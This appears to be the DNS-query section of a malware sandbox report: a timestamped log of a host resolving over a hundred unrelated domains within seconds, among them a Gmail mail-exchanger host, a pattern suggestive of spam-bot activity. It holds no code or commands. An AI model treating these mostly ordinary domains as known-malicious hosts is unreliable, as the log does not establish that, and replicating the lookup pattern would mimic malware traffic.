                                                                                                                                                                              Sep 15, 2023 07:27:49.791234970 CEST192.168.2.38.8.8.80x4e4eStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.854821920 CEST192.168.2.38.8.8.80xd4faStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.893692017 CEST192.168.2.38.8.8.80x7e14Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.921823025 CEST192.168.2.38.8.8.80xf40dStandard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.942126036 CEST192.168.2.38.8.8.80x1820Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.949760914 CEST192.168.2.38.8.8.80x4b4bStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:49.996066093 CEST192.168.2.38.8.8.80x65aaStandard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.057137012 CEST192.168.2.38.8.8.80x9b57Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.137948036 CEST192.168.2.38.8.8.80xb6bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.185857058 CEST192.168.2.38.8.8.80x1935Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.196321011 CEST192.168.2.38.8.8.80xa60dStandard query (0)wolffkran.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.201018095 CEST192.168.2.38.8.8.80x486fStandard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.248100996 CEST192.168.2.38.8.8.80xad08Standard query (0)nlcv.bas.bgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.411942959 CEST192.168.2.38.8.8.80x3b72Standard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.456363916 CEST192.168.2.38.8.8.80x5beStandard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.484280109 CEST192.168.2.38.8.8.80x229Standard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.570570946 CEST192.168.2.38.8.8.80xdb15Standard query (0)kavram.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.604671001 CEST192.168.2.38.8.8.80x920fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:50.909094095 CEST192.168.2.38.8.8.80xd4faStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.089267015 CEST192.168.2.38.8.8.80x61e7Standard query (0)dog-jog.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.134973049 CEST192.168.2.38.8.8.80xbb11Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.135113001 CEST192.168.2.38.8.8.80x9b57Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.137448072 CEST192.168.2.38.8.8.80xe897Standard query (0)ossir.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.147829056 CEST192.168.2.38.8.8.80x6397Standard query (0)rokoron.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.220940113 CEST192.168.2.38.8.8.80xc50eStandard query (0)someikan.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.220940113 CEST192.168.2.38.8.8.80xb6bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.223536968 CEST192.168.2.38.8.8.80x9fcbStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.225744009 CEST192.168.2.38.8.8.80x18b2Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.238920927 CEST192.168.2.38.8.8.80x1935Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.304997921 CEST192.168.2.38.8.8.80x3bcbStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.315840960 CEST192.168.2.38.8.8.80x837Standard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.318506956 CEST192.168.2.38.8.8.80x206fStandard query (0)envogen.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.403646946 CEST192.168.2.38.8.8.80xb47eStandard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.428980112 CEST192.168.2.38.8.8.80xc320Standard query (0)sanfotek.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.432013988 CEST192.168.2.38.8.8.80xcff5Standard query (0)jnf.atA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.441526890 CEST192.168.2.38.8.8.80xad43Standard query (0)softizer.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.443635941 CEST192.168.2.38.8.8.80xea24Standard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.454056025 CEST192.168.2.38.8.8.80xd84eStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.454292059 CEST192.168.2.38.8.8.80xe2feStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.546731949 CEST192.168.2.38.8.8.80xa47bStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.553822041 CEST192.168.2.38.8.8.80x9bc7Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.559653044 CEST192.168.2.38.8.8.80xeaecStandard query (0)grlawcc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.619628906 CEST192.168.2.38.8.8.80x920fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.653491974 CEST192.168.2.38.8.8.80x280bStandard query (0)iranytu.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.796178102 CEST192.168.2.38.8.8.80x971cStandard query (0)aba.org.egA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.826107025 CEST192.168.2.38.8.8.80x28abStandard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:51.928236961 CEST192.168.2.38.8.8.80xf451Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.017447948 CEST192.168.2.38.8.8.80x7033Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.031855106 CEST192.168.2.38.8.8.80x6cb4Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.122009993 CEST192.168.2.38.8.8.80xfb5eStandard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.122009993 CEST192.168.2.38.8.8.80x2613Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.226511002 CEST192.168.2.38.8.8.80xc143Standard query (0)eos-i.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.228570938 CEST192.168.2.38.8.8.80x1935Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.247179985 CEST192.168.2.38.8.8.80xc6f1Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.409274101 CEST192.168.2.38.8.8.80x59f3Standard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.430720091 CEST192.168.2.38.8.8.80x69b9Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.672719002 CEST192.168.2.38.8.8.80x81a8Standard query (0)likangds.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.673649073 CEST192.168.2.38.8.8.80x7e48Standard query (0)shteeble.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.733777046 CEST192.168.2.38.8.8.80x6034Standard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.764192104 CEST192.168.2.38.8.8.80xbd22Standard query (0)kevyt.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:52.906776905 CEST192.168.2.38.8.8.80xe9c4Standard query (0)floopis.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.031022072 CEST192.168.2.38.8.8.80x48b7Standard query (0)captlfix.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.134985924 CEST192.168.2.38.8.8.80x2613Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.140049934 CEST192.168.2.38.8.8.80x55a5Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.150268078 CEST192.168.2.38.8.8.80x9b57Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.218588114 CEST192.168.2.38.8.8.80x9611Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.228466988 CEST192.168.2.38.8.8.80xb6bbStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.321168900 CEST192.168.2.38.8.8.80xe71fStandard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.432198048 CEST192.168.2.38.8.8.80x69b9Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.440211058 CEST192.168.2.38.8.8.80x11f5Standard query (0)burstner.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.441091061 CEST192.168.2.38.8.8.80x5634Standard query (0)ntc.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.443458080 CEST192.168.2.38.8.8.80x14c5Standard query (0)michiana.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.469137907 CEST192.168.2.38.8.8.80x3ad2Standard query (0)cutchie.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.622653008 CEST192.168.2.38.8.8.80x31a8Standard query (0)infotech.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.634673119 CEST192.168.2.38.8.8.80x920fStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.855087042 CEST192.168.2.38.8.8.80x4554Standard query (0)cyclad.plA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:53.948756933 CEST192.168.2.38.8.8.80xfb69Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.135462999 CEST192.168.2.38.8.8.80xe22bStandard query (0)ncn.deA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.145529985 CEST192.168.2.38.8.8.80x4465Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.150629997 CEST192.168.2.38.8.8.80x2613Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.221198082 CEST192.168.2.38.8.8.80xeffeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.379647970 CEST192.168.2.38.8.8.80x6bd9Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.412709951 CEST192.168.2.38.8.8.80xe824Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.416899920 CEST192.168.2.38.8.8.80xb712Standard query (0)cjcagent.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.419949055 CEST192.168.2.38.8.8.80x3deStandard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.454480886 CEST192.168.2.38.8.8.80x69b9Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.486985922 CEST192.168.2.38.8.8.80x816bStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.596398115 CEST192.168.2.38.8.8.80xae23Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.598866940 CEST192.168.2.38.8.8.80xc514Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.641302109 CEST192.168.2.38.8.8.80x2afbStandard query (0)fdlymca.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.643784046 CEST192.168.2.38.8.8.80x999Standard query (0)camamat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.687231064 CEST192.168.2.38.8.8.80xbdfaStandard query (0)pers.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.702316046 CEST192.168.2.38.8.8.80x3fe9Standard query (0)gcss.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.859232903 CEST192.168.2.38.8.8.80x6030Standard query (0)daytonir.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:54.904474020 CEST192.168.2.38.8.8.80x8596Standard query (0)bigzz.byA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.123941898 CEST192.168.2.38.8.8.80xe8f5Standard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.150717020 CEST192.168.2.38.8.8.80x4465Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.231107950 CEST192.168.2.38.8.8.80xeffeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.297251940 CEST192.168.2.38.8.8.80x3ddfStandard query (0)www.tyrns.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.457818985 CEST192.168.2.38.8.8.80x765Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.509459972 CEST192.168.2.38.8.8.80x24aStandard query (0)unicus.jpA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.558350086 CEST192.168.2.38.8.8.80xb53aStandard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.603693008 CEST192.168.2.38.8.8.80xae23Standard query (0)webband.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.609407902 CEST192.168.2.38.8.8.80x8a91Standard query (0)t-mould.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.658034086 CEST192.168.2.38.8.8.80x3fd2Standard query (0)haigh-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.762065887 CEST192.168.2.38.8.8.80x4009Standard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.919884920 CEST192.168.2.38.8.8.80x803cStandard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:55.922857046 CEST192.168.2.38.8.8.80x1ca5Standard query (0)canasil.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.020282030 CEST192.168.2.38.8.8.80xd7f9Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.064105034 CEST192.168.2.38.8.8.80xea4bStandard query (0)riwn.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.120541096 CEST192.168.2.38.8.8.80xb77Standard query (0)amba-tc.siA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.155352116 CEST192.168.2.38.8.8.80xbe5bStandard query (0)bible.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.166724920 CEST192.168.2.38.8.8.80x4465Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.167157888 CEST192.168.2.38.8.8.80x2613Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.192642927 CEST192.168.2.38.8.8.80x9fb1Standard query (0)tozzhin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.196166992 CEST192.168.2.38.8.8.80x4b6cStandard query (0)msl-lock.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.204385042 CEST192.168.2.38.8.8.80x538Standard query (0)fr-dat.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.246169090 CEST192.168.2.38.8.8.80xeffeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.272165060 CEST192.168.2.38.8.8.80x83d8Standard query (0)nettlinx.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.280350924 CEST192.168.2.38.8.8.80x8f2fStandard query (0)at-shun.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.349805117 CEST192.168.2.38.8.8.80xc5a5Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.455755949 CEST192.168.2.38.8.8.80x55f9Standard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.499440908 CEST192.168.2.38.8.8.80xcafStandard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.623651981 CEST192.168.2.38.8.8.80x6659Standard query (0)www.spanesi.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.689224958 CEST192.168.2.38.8.8.80x69b4Standard query (0)linac.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.728476048 CEST192.168.2.38.8.8.80x9fa7Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.797704935 CEST192.168.2.38.8.8.80x195Standard query (0)bidroll.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:56.989134073 CEST192.168.2.38.8.8.80xe8cbStandard query (0)paraski.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.080662012 CEST192.168.2.38.8.8.80x3d35Standard query (0)www.tc17.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.277128935 CEST192.168.2.38.8.8.80x9fbStandard query (0)pertex.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.277584076 CEST192.168.2.38.8.8.80xb1ecStandard query (0)btsi.com.phA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.292112112 CEST192.168.2.38.8.8.80x3af6Standard query (0)forbin.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.421600103 CEST192.168.2.38.8.8.80xea05Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.530510902 CEST192.168.2.38.8.8.80xae81Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.579482079 CEST192.168.2.38.8.8.80x7803Standard query (0)doggybag.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.609472990 CEST192.168.2.38.8.8.80xd5b1Standard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.623403072 CEST192.168.2.38.8.8.80xd3b0Standard query (0)wanoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.632164001 CEST192.168.2.38.8.8.80x22a2Standard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.660381079 CEST192.168.2.38.8.8.80xa0d2Standard query (0)sokuwan.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.699033976 CEST192.168.2.38.8.8.80xc5cdStandard query (0)jsaps.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.793143988 CEST192.168.2.38.8.8.80x78faStandard query (0)pro-fa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.799866915 CEST192.168.2.38.8.8.80x46baStandard query (0)ciicsc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.845493078 CEST192.168.2.38.8.8.80x202fStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:57.985268116 CEST192.168.2.38.8.8.80xabffStandard query (0)aluminox.esA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.093781948 CEST192.168.2.38.8.8.80x4a77Standard query (0)skypearl.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.184168100 CEST192.168.2.38.8.8.80x4465Standard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.262734890 CEST192.168.2.38.8.8.80xeffeStandard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.298306942 CEST192.168.2.38.8.8.80xea3cStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.312834024 CEST192.168.2.38.8.8.80x9242Standard query (0)enguita.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.403136969 CEST192.168.2.38.8.8.80xa46eStandard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.512074947 CEST192.168.2.38.8.8.80xa55cStandard query (0)jabian.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.527030945 CEST192.168.2.38.8.8.80x3537Standard query (0)toundo.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.533575058 CEST192.168.2.38.8.8.80x7c98Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.636522055 CEST192.168.2.38.8.8.80xfbd9Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.703891039 CEST192.168.2.38.8.8.80xd087Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.737138033 CEST192.168.2.38.8.8.80xf0c8Standard query (0)h-et-l.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.807672024 CEST192.168.2.38.8.8.80xe5b7Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.843857050 CEST192.168.2.38.8.8.80x8719Standard query (0)tbvlugus.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.853693962 CEST192.168.2.38.8.8.80x202fStandard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:58.908169985 CEST192.168.2.38.8.8.80x6f23Standard query (0)cpwpb.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.244210005 CEST192.168.2.38.8.8.80xb20eStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.292031050 CEST192.168.2.38.8.8.80xfd85Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.311456919 CEST192.168.2.38.8.8.80x9d2fStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.317100048 CEST192.168.2.38.8.8.80x5ab0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.421293974 CEST192.168.2.38.8.8.80x930Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.453084946 CEST192.168.2.38.8.8.80x73b5Standard query (0)acraloc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.526648998 CEST192.168.2.38.8.8.80xc94eStandard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.579430103 CEST192.168.2.38.8.8.80x743fStandard query (0)okashimo.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.592787027 CEST192.168.2.38.8.8.80x99b7Standard query (0)atb-lit.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.636476994 CEST192.168.2.38.8.8.80xdf52Standard query (0)anteph.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.840177059 CEST192.168.2.38.8.8.80xda39Standard query (0)koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.935175896 CEST192.168.2.38.8.8.80xbabfStandard query (0)gmail-smtp-in.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:27:59.942693949 CEST192.168.2.38.8.8.80x5dc0Standard query (0)websy.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.030380011 CEST192.168.2.38.8.8.80x3009Standard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.043030024 CEST192.168.2.38.8.8.80x7558Standard query (0)ymlp15.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.043651104 CEST192.168.2.38.8.8.80x3772Standard query (0)mcseurope.nlA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.136882067 CEST192.168.2.38.8.8.80xbc2dStandard query (0)x96.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.227256060 CEST192.168.2.38.8.8.80x7a7aStandard query (0)hes.ptA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.251950979 CEST192.168.2.38.8.8.80x290eStandard query (0)refintl.orgA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.265347958 CEST192.168.2.38.8.8.80xb20eStandard query (0)actmin.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.312382936 CEST192.168.2.38.8.8.80xfd85Standard query (0)stopllc.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.323043108 CEST192.168.2.38.8.8.80x9d2fStandard query (0)ktenergo.ruA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.323043108 CEST192.168.2.38.8.8.80x5ab0Standard query (0)clysma.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.325644016 CEST192.168.2.38.8.8.80x8d50Standard query (0)tcpoa.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.340610981 CEST192.168.2.38.8.8.80xb26cStandard query (0)ifesnet.comA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.349659920 CEST192.168.2.38.8.8.80x216cStandard query (0)zemarmot.netA (IP address)IN (0x0001)false
                                                                                                                                                                              Sep 15, 2023 07:28:00.519624949 CEST192.168.2.38.8.8.80x64fcStandard query (0)ascc.org.auA (IP address)IN (0x0001)false
